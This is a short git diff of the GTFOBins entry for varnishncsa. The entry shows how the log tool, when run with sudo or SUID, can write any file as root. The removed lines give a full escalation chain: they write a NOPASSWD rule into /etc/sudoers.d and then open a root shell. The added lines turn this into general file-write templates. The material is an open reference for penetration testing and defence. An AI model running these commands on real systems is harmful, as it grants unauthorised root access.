Polish varnishncsa

_gtfobins/varnishncsa.md

@@ -1,8 +1,18 @@
 ---
-description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format.
+description: |
+  This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
+
+  ```
+  curl -H 'yyy: DATA' http://localhost:6081/xxx
+  ```
+description: 
 functions:
-    sudo:
-        - code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user &
-        - code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo
-        - code: sudo bash
----
+  sudo:
+    code: |
+      LFILE=file_to_write
+      sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+  suid:
+    code: |
+      LFILE=file_to_write
+      ./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+---